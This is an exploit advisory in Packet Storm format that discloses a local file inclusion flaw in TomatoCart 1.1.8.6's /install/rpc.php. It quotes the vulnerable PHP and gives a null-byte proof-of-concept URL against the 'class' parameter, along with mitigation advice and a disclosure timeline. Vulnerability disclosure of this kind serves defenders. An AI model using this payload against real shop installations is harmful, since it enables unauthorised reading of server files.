TomatoCart 1.1.8.6 Local File Inclusion

2014-02-15T00:00:00
ID PACKETSTORM:125220
Type packetstorm
Reporter TUNISIAN CYBER
Modified 2014-02-15T00:00:00

Description

                                        
                                            `[+] Author: TUNISIAN CYBER  
[+] Exploit Title: TomatoCart 1.1.8.6 Local File Inclusion Vulnerability  
[+] Date: 14-02-2014  
[+] Category: WebApp  
[+] Tested on: KaliLinux  
[+] Vendor: http://www.tomatocart.com/  
[+] Friendly Sites: na3il.com,th3-creative.com  
  
1.OVERVIEW:  
TomatoCart 1.1.8.6 (old versions too) suffers from a LFI Vulnerability.  
More Info about LFI:  
https://www.netsparker.com/local-file-inclusion/  
  
2.Background:  
TomatoCart is open source ecommerce solution developed and maintained by a number of 64,000+ users from 50+ countries and regions.   
It's distributed under the terms of the GNU General Public License (or "GPL"),   
free to download and share.   
The community, including project founders and other developers,   
are supposed to work together on the platform of TomatoCart, contributing features, technical support and services.  
http://www.tomatocart.com/about-us/about-tomatocart.html  
  
3.Vulnerability:  
File : /install/rpc.php Lines:21--->44  
[PHP]  
if (isset($_GET['action']) && !empty($_GET['action'])) {  
switch ($_GET['action']) {  
case 'dbCheck':  
$db = array('DB_SERVER' => trim(urldecode($_GET['server'])),  
'DB_SERVER_USERNAME' => trim(urldecode($_GET['username'])),  
'DB_SERVER_PASSWORD' => trim(urldecode($_GET['password'])),  
'DB_DATABASE' => trim(urldecode($_GET['name'])),  
'DB_DATABASE_CLASS' => trim(urldecode($_GET['class']))  
);  
  
$osC_Database = osC_Database::connect($db['DB_SERVER'], $db['DB_SERVER_USERNAME'], $db['DB_SERVER_PASSWORD'], $db['DB_DATABASE_CLASS']);  
  
if ($osC_Database->isError() === false) {  
$osC_Database->selectDatabase($db['DB_DATABASE']);  
}  
  
if ($osC_Database->isError()) {  
echo '[[0|' . $osC_Database->getError() . ']]';  
} else {  
echo '[[1]]';  
}  
  
exit;  
break;  
[PHP]  
  
4.Proof Of Concept:  
127.0.0.1/install/rpc.php?action=dbCheck&class=LFI%00  
  
5.Solution(s):  
No Patch was released.  
Delete "/install/" Folder.  
Use another ShoppingApplication.  
  
6.TIME-LINE:  
2014-02-13: Vulnerability was discovered.  
2014-02-13: Contact with vendor.  
2014-02-14: No Reply  
2014-02-14: Vulnerability Released  
  
7.Greetings:  
Xmax-tn  
Xtech-set  
N43il  
Sec4ver,E4A Members  
`